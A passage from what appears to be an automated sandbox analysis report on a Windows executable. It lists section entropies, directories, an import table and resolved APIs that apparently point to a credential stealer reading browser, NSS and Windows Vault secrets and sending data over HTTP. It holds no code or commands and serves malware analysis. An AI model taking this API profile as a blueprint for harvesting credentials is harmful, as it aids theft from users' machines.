- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00064000",
- "size_of_data": "0x00009600",
- "entropy": "4.97",
- "raw_address": "0x00062600",
- "virtual_size": "0x00009528",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": "BSS",
- "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0006e000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x0006bc00",
- "virtual_size": "0x00000d59",
- "characteristics_raw": "0xc0000000"
- },
- {
- "name": ".idata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0006f000",
- "size_of_data": "0x00002600",
- "entropy": "5.01",
- "raw_address": "0x0006bc00",
- "virtual_size": "0x00002540",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".tls",
- "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00072000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x0006e200",
- "virtual_size": "0x00000010",
- "characteristics_raw": "0xc0000000"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00073000",
- "size_of_data": "0x00000200",
- "entropy": "0.21",
- "raw_address": "0x0006e200",
- "virtual_size": "0x00000018",
- "characteristics_raw": "0x50000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00074000",
- "size_of_data": "0x00007200",
- "entropy": "6.67",
- "raw_address": "0x0006e400",
- "virtual_size": "0x00007108",
- "characteristics_raw": "0x50000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0007c000",
- "size_of_data": "0x00025c00",
- "entropy": "7.08",
- "raw_address": "0x00075600",
- "virtual_size": "0x00025b70",
- "characteristics_raw": "0x50000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0006f000",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00002540"
- },
- {
- "virtual_address": "0x0007c000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00025b70"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00074000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00007108"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00073000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000018"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "46116a2f8090728368dbf9ef96584273",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 17,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.GetDiskFreeSpaceExA",
- "oleaut32.dll.VariantChangeTypeEx",
- "oleaut32.dll.VarNeg",
- "oleaut32.dll.VarNot",
- "oleaut32.dll.VarAdd",
- "oleaut32.dll.VarSub",
- "oleaut32.dll.VarMul",
- "oleaut32.dll.VarDiv",
- "oleaut32.dll.VarIdiv",
- "oleaut32.dll.VarMod",
- "oleaut32.dll.VarAnd",
- "oleaut32.dll.VarOr",
- "oleaut32.dll.VarXor",
- "oleaut32.dll.VarCmp",
- "oleaut32.dll.VarI4FromStr",
- "oleaut32.dll.VarR4FromStr",
- "oleaut32.dll.VarR8FromStr",
- "oleaut32.dll.VarDateFromStr",
- "oleaut32.dll.VarCyFromStr",
- "oleaut32.dll.VarBoolFromStr",
- "oleaut32.dll.VarBstrFromCy",
- "oleaut32.dll.VarBstrFromDate",
- "oleaut32.dll.VarBstrFromBool",
- "user32.dll.GetMonitorInfoA",
- "user32.dll.GetSystemMetrics",
- "user32.dll.EnumDisplayMonitors",
- "dwmapi.dll.DwmIsCompositionEnabled",
- "gdi32.dll.GetLayout",
- "gdi32.dll.GdiRealizationInfo",
- "gdi32.dll.FontIsLinked",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegQueryInfoKeyW",
- "gdi32.dll.GetTextFaceAliasW",
- "advapi32.dll.RegEnumValueW",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegQueryValueExW",
- "gdi32.dll.GetFontAssocStatus",
- "advapi32.dll.RegQueryValueExA",
- "advapi32.dll.RegEnumKeyExW",
- "gdi32.dll.GdiIsMetaPrintDC",
- "user32.dll.AnimateWindow",
- "comctl32.dll.InitializeFlatSB",
- "comctl32.dll.UninitializeFlatSB",
- "comctl32.dll.FlatSB_GetScrollProp",
- "comctl32.dll.FlatSB_SetScrollProp",
- "comctl32.dll.FlatSB_EnableScrollBar",
- "comctl32.dll.FlatSB_ShowScrollBar",
- "comctl32.dll.FlatSB_GetScrollRange",
- "comctl32.dll.FlatSB_GetScrollInfo",
- "comctl32.dll.FlatSB_GetScrollPos",
- "comctl32.dll.FlatSB_SetScrollPos",
- "comctl32.dll.FlatSB_SetScrollInfo",
- "comctl32.dll.FlatSB_SetScrollRange",
- "user32.dll.SetLayeredWindowAttributes",
- "ole32.dll.CoCreateInstanceEx",
- "ole32.dll.CoInitializeEx",
- "ole32.dll.CoAddRefServerProcess",
- "ole32.dll.CoReleaseServerProcess",
- "ole32.dll.CoResumeClassObjects",
- "ole32.dll.CoSuspendClassObjects",
- "olepro32.dll.OleCreatePropertyFrame",
- "olepro32.dll.OleCreateFontIndirect",
- "olepro32.dll.OleCreatePictureIndirect",
- "olepro32.dll.OleLoadPicture",
- "crypt32.dll.CryptUnprotectData",
- "crtdll.dll.wcscmp",
- "gdiplus.dll.GdiplusStartup",
- "gdiplus.dll.GdiplusShutdown",
- "gdiplus.dll.GdipCreateBitmapFromHBITMAP",
- "gdiplus.dll.GdipGetImageEncodersSize",
- "gdiplus.dll.GdipGetImageEncoders",
- "gdiplus.dll.GdipDisposeImage",
- "gdiplus.dll.GdipSaveImageToStream",
- "ole32.dll.CreateStreamOnHGlobal",
- "ole32.dll.GetHGlobalFromStream",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.GetComputerNameW",
- "kernel32.dll.GlobalMemoryStatus",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.ReadFile",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.ReleaseMutex",
- "kernel32.dll.GetLastError",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.SetCurrentDirectoryW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.LocalFree",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.FindClose",
- "kernel32.dll.GlobalMemoryStatusEx",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.SetDllDirectoryW",
- "kernel32.dll.GetLocaleInfoA",
- "kernel32.dll.GetLocalTime",
- "kernel32.dll.GetTimeZoneInformation",
- "kernel32.dll.RemoveDirectoryW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.GetLogicalDriveStringsA",
- "kernel32.dll.GetDriveTypeA",
- "kernel32.dll.CreateProcessW",
- "advapi32.dll.GetUserNameW",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.LookupAccountSidA",
- "advapi32.dll.CreateProcessAsUserW",
- "advapi32.dll.CheckTokenMembership",
- "advapi32.dll.RegOpenKeyW",
- "advapi32.dll.RegEnumKeyW",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.CryptCreateHash",
- "advapi32.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "advapi32.dll.CryptDestroyHash",
- "advapi32.dll.CryptReleaseContext",
- "user32.dll.EnumDisplayDevicesW",
- "user32.dll.wvsprintfA",
- "user32.dll.GetKeyboardLayoutList",
- "shell32.dll.ShellExecuteExW",
- "ntdll.dll.RtlComputeCrc32",
- "sechost.dll.LookupAccountSidLocalA",
- "wininet.dll.InternetOpenA",
- "wininet.dll.InternetConnectA",
- "wininet.dll.HttpOpenRequestA",
- "wininet.dll.HttpAddRequestHeadersA",
- "wininet.dll.HttpSendRequestA",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetCrackUrlA",
- "wininet.dll.InternetSetOptionA",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "cryptbase.dll.SystemFunction036",
- "nss3.dll.sqlite3_open",
- "nss3.dll.sqlite3_close",
- "nss3.dll.sqlite3_prepare_v2",
- "nss3.dll.sqlite3_step",
- "nss3.dll.sqlite3_column_text",
- "nss3.dll.sqlite3_column_bytes",
- "nss3.dll.sqlite3_finalize",
- "nss3.dll.NSS_Init",
- "nss3.dll.PK11_GetInternalKeySlot",
- "nss3.dll.PK11_Authenticate",
- "nss3.dll.PK11SDR_Decrypt",
- "nss3.dll.NSS_Shutdown",
- "nss3.dll.PK11_FreeSlot",
- "kernel32.dll.InitializeCriticalSectionEx",
- "ole32.dll.CLSIDFromString",
- "vaultcli.dll.VaultOpenVault",
- "vaultcli.dll.VaultEnumerateItems",
- "vaultcli.dll.VaultGetItem",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "mlang.dll.#112",
- "wininet.dll.FindFirstUrlCacheEntryA",
- "urlmon.dll.CreateUri",
- "wininet.dll.FindNextUrlCacheEntryA",
- "urlmon.dll.CreateIUriBuilder",
- "urlmon.dll.IntlPercentEncodeNormalize",
- "wininet.dll.FindCloseUrlCache",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.NdrClientCall2",
- "cryptbase.dll.SystemFunction041",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingFree",
- "kernel32.dll.IsProcessorFeaturePresent",
- "user32.dll.GetWindowInfo",
- "user32.dll.GetAncestor",
- "user32.dll.EnumDisplayDevicesA",
- "gdi32.dll.ExtTextOutW",
- "kernel32.dll.FlsGetValue",
- "windowscodecs.dll.DllGetClassObject",
- "kernel32.dll.WerRegisterMemoryBlock",
- "oleaut32.dll.#8",
- "oleaut32.dll.#9",
- "oleaut32.dll.#10",
- "kernel32.dll.IsWow64Process",
- "kernel32.dll.FlsFree"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "DeleteCriticalSection",
- "address": "0x46f168"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x46f16c"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x46f170"
- },
- {
- "name": "InitializeCriticalSection",
- "address": "0x46f174"
- },
- {
- "name": "VirtualFree",
- "address": "0x46f178"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x46f17c"
- },
- {
- "name": "LocalFree",
- "address": "0x46f180"
- },
- {
- "name": "LocalAlloc",
- "address": "0x46f184"
- },
- {
- "name": "GetVersion",
- "address": "0x46f188"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x46f18c"
- },
- {
- "name": "InterlockedDecrement",
- "address": "0x46f190"
- },
- {
- "name": "InterlockedIncrement",
- "address": "0x46f194"
- },
- {
- "name": "VirtualQuery",
- "address": "0x46f198"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x46f19c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x46f1a0"
- },
- {
- "name": "lstrlenA",
- "address": "0x46f1a4"
- },
- {
- "name": "lstrcpynA",
- "address": "0x46f1a8"
- },
- {
- "name": "LoadLibraryExA",
- "address": "0x46f1ac"
- },
- {
- "name": "GetThreadLocale",
- "address": "0x46f1b0"
- },
- {
- "name": "GetStartupInfoA",
- "address": "0x46f1b4"
- },
- {
- "name": "GetProcAddress",
- "address": "0x46f1b8"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x46f1bc"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x46f1c0"
- },
- {
- "name": "GetLocaleInfoA",
- "address": "0x46f1c4"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x46f1c8"
- },
- {
- "name": "FreeLibrary",
- "address": "0x46f1cc"
- },
- {
- "name": "FindFirstFileA",
- "address": "0x46f1d0"
- },
- {
- "name": "FindClose",
- "address": "0x46f1d4"
- },
- {
- "name": "ExitProcess",
- "address": "0x46f1d8"
- },
- {
- "name": "WriteFile",
- "address": "0x46f1dc"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x46f1e0"
- },
- {
- "name": "RtlUnwind",
- "address": "0x46f1e4"
- },
- {
- "name": "RaiseException",
- "address": "0x46f1e8"
- },
- {
- "name": "GetStdHandle",
- "address": "0x46f1ec"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "GetKeyboardType",
- "address": "0x46f1f4"
- },
- {
- "name": "LoadStringA",
- "address": "0x46f1f8"
- },
- {
- "name": "MessageBoxA",
- "address": "0x46f1fc"
- },
- {
- "name": "CharNextA",
- "address": "0x46f200"
- }
- ],
- "dll": "user32.dll"
- },
- {
- "imports": [
- {
- "name": "RegQueryValueExA",
- "address": "0x46f208"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x46f20c"
- },
- {
- "name": "RegCloseKey",
- "address": "0x46f210"
- }
- ],
- "dll": "advapi32.dll"
- },
- {
- "imports": [
- {
- "name": "SysFreeString",
- "address": "0x46f218"
- },
- {
- "name": "SysReAllocStringLen",
- "address": "0x46f21c"
- },
- {
- "name": "SysAllocStringLen",
- "address": "0x46f220"
- }
- ],
- "dll": "oleaut32.dll"
- },
- {
- "imports": [
- {
- "name": "TlsSetValue",
- "address": "0x46f228"
- },
- {
- "name": "TlsGetValue",
- "address": "0x46f22c"
- },
- {
- "name": "LocalAlloc",
- "address": "0x46f230"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x46f234"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "RegQueryValueExA",
- "address": "0x46f23c"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x46f240"
- },
- {
- "name": "RegCloseKey",
- "address": "0x46f244"
- }
- ],
- "dll": "advapi32.dll"
- },
- {
- "imports": [
- {
- "name": "lstrcpyA",
- "address": "0x46f24c"
- },
- {
- "name": "WriteFile",
- "address": "0x46f250"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x46f254"
- },
- {
- "name": "VirtualQuery",
- "address": "0x46f258"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x46f25c"
- },
- {
- "name": "Sleep",
- "address": "0x46f260"
- },
- {
- "name": "SizeofResource",
- "address": "0x46f264"
- },
- {
- "name": "SetThreadLocale",
- "address": "0x46f268"
- },
- {
- "name": "SetFilePointer",
- "address": "0x46f26c"
- },
- {
- "name": "SetEvent",
- "address": "0x46f270"
- },
- {
- "name": "SetErrorMode",
- "address": "0x46f274"
- },
- {
- "name": "SetEndOfFile",
- "address": "0x46f278"
- },
- {
- "name": "ResetEvent",
- "address": "0x46f27c"
- },
- {
- "name": "ReadFile",
- "address": "0x46f280"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x46f284"
- },
- {
- "name": "MulDiv",
- "address": "0x46f288"
- },
- {
- "name": "LockResource",
- "address": "0x46f28c"
- },
- {
- "name": "LoadResource",
- "address": "0x46f290"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x46f294"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x46f298"
- },
- {
- "name": "InitializeCriticalSection",
- "address": "0x46f29c"
- },
- {
- "name": "GlobalUnlock",
- "address": "0x46f2a0"
- },
- {
- "name": "GlobalSize",
- "address": "0x46f2a4"
- },
- {
- "name": "GlobalReAlloc",
- "address": "0x46f2a8"
- },
- {
- "name": "GlobalHandle",
- "address": "0x46f2ac"
- },
- {
- "name": "GlobalLock",
- "address": "0x46f2b0"
- },
- {
- "name": "GlobalFree",
- "address": "0x46f2b4"
- },
- {
- "name": "GlobalFindAtomA",
- "address": "0x46f2b8"
- },
- {
- "name": "GlobalDeleteAtom",
- "address": "0x46f2bc"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x46f2c0"
- },
- {
- "name": "GlobalAddAtomA",
- "address": "0x46f2c4"
- },
- {
- "name": "GetVersionExA",
- "address": "0x46f2c8"
- },
- {
- "name": "GetVersion",
- "address": "0x46f2cc"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x46f2d0"
- },
- {
- "name": "GetTickCount",
- "address": "0x46f2d4"
- },
- {
- "name": "GetThreadLocale",
- "address": "0x46f2d8"
- },
- {
- "name": "GetSystemInfo",
- "address": "0x46f2dc"
- },
- {
- "name": "GetStringTypeExA",
- "address": "0x46f2e0"
- },
- {
- "name": "GetStdHandle",
- "address": "0x46f2e4"
- },
- {
- "name": "GetProfileStringA",
- "address": "0x46f2e8"
- },
- {
- "name": "GetProcAddress",
- "address": "0x46f2ec"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x46f2f0"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x46f2f4"
- },
- {
- "name": "GetLocaleInfoA",
- "address": "0x46f2f8"
- },
- {
- "name": "GetLocalTime",
- "address": "0x46f2fc"
- },
- {
- "name": "GetLastError",
- "address": "0x46f300"
- },
- {
- "name": "GetFullPathNameA",
- "address": "0x46f304"
- },
- {
- "name": "GetDiskFreeSpaceA",
- "address": "0x46f308"
- },
- {
- "name": "GetDateFormatA",
- "address": "0x46f30c"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x46f310"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x46f314"
- },
- {
- "name": "GetComputerNameA",
- "address": "0x46f318"
- },
- {
- "name": "GetCPInfo",
- "address": "0x46f31c"
- },
- {
- "name": "GetACP",
- "address": "0x46f320"
- },
- {
- "name": "FreeResource",
- "address": "0x46f324"
- },
- {
- "name": "InterlockedExchange",
- "address": "0x46f328"
- },
- {
- "name": "FreeLibrary",
- "address": "0x46f32c"
- },
- {
- "name": "FormatMessageA",
- "address": "0x46f330"
- },
- {
- "name": "FindResourceA",
- "address": "0x46f334"
- },
- {
- "name": "EnumCalendarInfoA",
- "address": "0x46f338"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x46f33c"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x46f340"
- },
- {
- "name": "CreateThread",
- "address": "0x46f344"
- },
- {
- "name": "CreateFileA",
- "address": "0x46f348"
- },
- {
- "name": "CreateEventA",
- "address": "0x46f34c"
- },
- {
- "name": "CompareStringA",
- "address": "0x46f350"
- },
- {
- "name": "CloseHandle",
- "address": "0x46f354"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "VerQueryValueA",
- "address": "0x46f35c"
- },
- {
- "name": "GetFileVersionInfoSizeA",
- "address": "0x46f360"
- },
- {
- "name": "GetFileVersionInfoA",
- "address": "0x46f364"
- }
- ],
- "dll": "version.dll"
- },
- {
- "imports": [
- {
- "name": "UnrealizeObject",
- "address": "0x46f36c"
- },
- {
- "name": "StretchBlt",
- "address": "0x46f370"
- },
- {
- "name": "SetWindowOrgEx",
- "address": "0x46f374"
- },
- {
- "name": "SetWinMetaFileBits",
- "address": "0x46f378"
- },
- {
- "name": "SetViewportOrgEx",
- "address": "0x46f37c"
- },
- {
- "name": "SetTextColor",
- "address": "0x46f380"
- },
- {
- "name": "SetStretchBltMode",
- "address": "0x46f384"
- },
- {
- "name": "SetROP2",
- "address": "0x46f388"
- },
- {
- "name": "SetPixel",
- "address": "0x46f38c"
- },
- {
- "name": "SetMapMode",
- "address": "0x46f390"
- },
- {
- "name": "SetEnhMetaFileBits",
- "address": "0x46f394"
- },
- {
- "name": "SetDIBColorTable",
- "address": "0x46f398"
- },
- {
- "name": "SetBrushOrgEx",
- "address": "0x46f39c"
- },
- {
- "name": "SetBkMode",
- "address": "0x46f3a0"
- },
- {
- "name": "SetBkColor",
- "address": "0x46f3a4"
- },
- {
- "name": "SelectPalette",
- "address": "0x46f3a8"
- },
- {
- "name": "SelectObject",
- "address": "0x46f3ac"
- },
- {
- "name": "SelectClipRgn",
- "address": "0x46f3b0"
- },
- {
- "name": "ScaleWindowExtEx",
- "address": "0x46f3b4"
- },
- {
- "name": "SaveDC",
- "address": "0x46f3b8"
- },
- {
- "name": "RestoreDC",
- "address": "0x46f3bc"
- },
- {
- "name": "RectVisible",
- "address": "0x46f3c0"
- },
- {
- "name": "RealizePalette",
- "address": "0x46f3c4"
- },
- {
- "name": "PlayEnhMetaFile",
- "address": "0x46f3c8"
- },
- {
- "name": "PathToRegion",
- "address": "0x46f3cc"
- },
- {
- "name": "PatBlt",
- "address": "0x46f3d0"
- },
- {
- "name": "MoveToEx",
- "address": "0x46f3d4"
- },
- {
- "name": "MaskBlt",
- "address": "0x46f3d8"
- },
- {
- "name": "LineTo",
- "address": "0x46f3dc"
- },
- {
- "name": "LPtoDP",
- "address": "0x46f3e0"
- },
- {
- "name": "IntersectClipRect",
- "address": "0x46f3e4"
- },
- {
- "name": "GetWindowOrgEx",
- "address": "0x46f3e8"
- },
- {
- "name": "GetWinMetaFileBits",
- "address": "0x46f3ec"
- },
- {
- "name": "GetTextMetricsA",
- "address": "0x46f3f0"
- },
- {
- "name": "GetTextExtentPoint32A",
- "address": "0x46f3f4"
- },
- {
- "name": "GetSystemPaletteEntries",
- "address": "0x46f3f8"
- },
- {
- "name": "GetStockObject",
- "address": "0x46f3fc"
- },
- {
- "name": "GetPixel",
- "address": "0x46f400"
- },
- {
- "name": "GetPaletteEntries",
- "address": "0x46f404"
- },
- {
- "name": "GetObjectA",
- "address": "0x46f408"
- },
- {
- "name": "GetEnhMetaFilePaletteEntries",
- "address": "0x46f40c"
- },
- {
- "name": "GetEnhMetaFileHeader",
- "address": "0x46f410"
- },
- {
- "name": "GetEnhMetaFileDescriptionA",
- "address": "0x46f414"
- },
- {
- "name": "GetEnhMetaFileBits",
- "address": "0x46f418"
- },
- {
- "name": "GetDeviceCaps",
- "address": "0x46f41c"
- },
- {
- "name": "GetDIBits",
- "address": "0x46f420"
- },
- {
- "name": "GetDIBColorTable",
- "address": "0x46f424"
- },
- {
- "name": "GetDCOrgEx",
- "address": "0x46f428"
- },
- {
- "name": "GetCurrentPositionEx",
- "address": "0x46f42c"
- },
- {
- "name": "GetClipBox",
- "address": "0x46f430"
- },
- {
- "name": "GetBrushOrgEx",
- "address": "0x46f434"
- },
- {
- "name": "GetBitmapBits",
- "address": "0x46f438"
- },
- {
- "name": "ExcludeClipRect",
- "address": "0x46f43c"
- },
- {
- "name": "EndPage",
- "address": "0x46f440"
- },
- {
- "name": "EndDoc",
- "address": "0x46f444"
- },
- {
- "name": "DeleteObject",
- "address": "0x46f448"
- },
- {
- "name": "DeleteEnhMetaFile",
- "address": "0x46f44c"
- },
- {
- "name": "DeleteDC",
- "address": "0x46f450"
- },
- {
- "name": "CreateSolidBrush",
- "address": "0x46f454"
- },
- {
- "name": "CreatePenIndirect",
- "address": "0x46f458"
- },
- {
- "name": "CreatePalette",
- "address": "0x46f45c"
- },
- {
- "name": "CreateICA",
- "address": "0x46f460"
- },
- {
- "name": "CreateHalftonePalette",
- "address": "0x46f464"
- },
- {
- "name": "CreateFontIndirectA",
- "address": "0x46f468"
- },
- {
- "name": "CreateEnhMetaFileA",
- "address": "0x46f46c"
- },
- {
- "name": "CreateDIBitmap",
- "address": "0x46f470"
- },
- {
- "name": "CreateDIBSection",
- "address": "0x46f474"
- },
- {
- "name": "CreateDCA",
- "address": "0x46f478"
- },
- {
- "name": "CreateCompatibleDC",
- "address": "0x46f47c"
- },
- {
- "name": "CreateCompatibleBitmap",
- "address": "0x46f480"
- },
- {
- "name": "CreateBrushIndirect",
- "address": "0x46f484"
- },
- {
- "name": "CreateBitmap",
- "address": "0x46f488"
- },
- {
- "name": "CopyEnhMetaFileA",
- "address": "0x46f48c"
- },
- {
- "name": "CloseEnhMetaFile",
- "address": "0x46f490"
- },
- {
- "name": "BitBlt",
- "address": "0x46f494"
- }
- ],
- "dll": "gdi32.dll"
- },
- {
- "imports": [
- {
- "name": "CreateWindowExA",
- "address": "0x46f49c"
- },
- {
- "name": "WindowFromPoint",
- "address": "0x46f4a0"
- },
- {
- "name": "WinHelpA",
- "address": "0x46f4a4"
- },
- {
- "name": "WaitMessage",
- "address": "0x46f4a8"
- },
- {
- "name": "UpdateWindow",
- "address": "0x46f4ac"
- },
- {
- "name": "UnregisterClassA",
- "address": "0x46f4b0"
- },
- {
- "name": "UnhookWindowsHookEx",
- "address": "0x46f4b4"
- },
- {
- "name": "TranslateMessage",
- "address": "0x46f4b8"
- },
- {
- "name": "TranslateMDISysAccel",
- "address": "0x46f4bc"
- },
- {
- "name": "TrackPopupMenu",
- "address": "0x46f4c0"
- },
- {
- "name": "SystemParametersInfoA",
- "address": "0x46f4c4"
- },
- {
- "name": "ShowWindow",
- "address": "0x46f4c8"
- },
- {
- "name": "ShowScrollBar",
- "address": "0x46f4cc"
- },
- {
- "name": "ShowOwnedPopups",
- "address": "0x46f4d0"
- },
- {
- "name": "ShowCursor",
- "address": "0x46f4d4"
- },
- {
- "name": "SetWindowsHookExA",
- "address": "0x46f4d8"
- },
- {
- "name": "SetWindowTextA",
- "address": "0x46f4dc"
- },
- {
- "name": "SetWindowPos",
- "address": "0x46f4e0"
- },
- {
- "name": "SetWindowPlacement",
- "address": "0x46f4e4"
- },
- {
- "name": "SetWindowLongA",
- "address": "0x46f4e8"
- },
- {
- "name": "SetTimer",
- "address": "0x46f4ec"
- },
- {
- "name": "SetScrollRange",
- "address": "0x46f4f0"
- },
- {
- "name": "SetScrollPos",
- "address": "0x46f4f4"
- },
- {
- "name": "SetScrollInfo",
- "address": "0x46f4f8"
- },
- {
- "name": "SetRect",
- "address": "0x46f4fc"
- },
- {
- "name": "SetPropA",
- "address": "0x46f500"
- },
- {
- "name": "SetParent",
- "address": "0x46f504"
- },
- {
- "name": "SetMenuItemInfoA",
- "address": "0x46f508"
- },
- {
- "name": "SetMenu",
- "address": "0x46f50c"
- },
- {
- "name": "SetKeyboardState",
- "address": "0x46f510"
- },
- {
- "name": "SetForegroundWindow",
- "address": "0x46f514"
- },
- {
- "name": "SetFocus",
- "address": "0x46f518"
- },
- {
- "name": "SetCursor",
- "address": "0x46f51c"
- },
- {
- "name": "SetClipboardData",
- "address": "0x46f520"
- },
- {
- "name": "SetClassLongA",
- "address": "0x46f524"
- },
- {
- "name": "SetCapture",
- "address": "0x46f528"
- },
- {
- "name": "SetActiveWindow",
- "address": "0x46f52c"
- },
- {
- "name": "SendMessageA",
- "address": "0x46f530"
- },
- {
- "name": "ScrollWindow",
- "address": "0x46f534"
- },
- {
- "name": "ScreenToClient",
- "address": "0x46f538"
- },
- {
- "name": "RemovePropA",
- "address": "0x46f53c"
- },
- {
- "name": "RemoveMenu",
- "address": "0x46f540"
- },
- {
- "name": "ReleaseDC",
- "address": "0x46f544"
- },
- {
- "name": "ReleaseCapture",
- "address": "0x46f548"
- },
- {
- "name": "RegisterWindowMessageA",
- "address": "0x46f54c"
- },
- {
- "name": "RegisterClipboardFormatA",
- "address": "0x46f550"
- },
- {
- "name": "RegisterClassA",
- "address": "0x46f554"
- },
- {
- "name": "RedrawWindow",
- "address": "0x46f558"
- },
- {
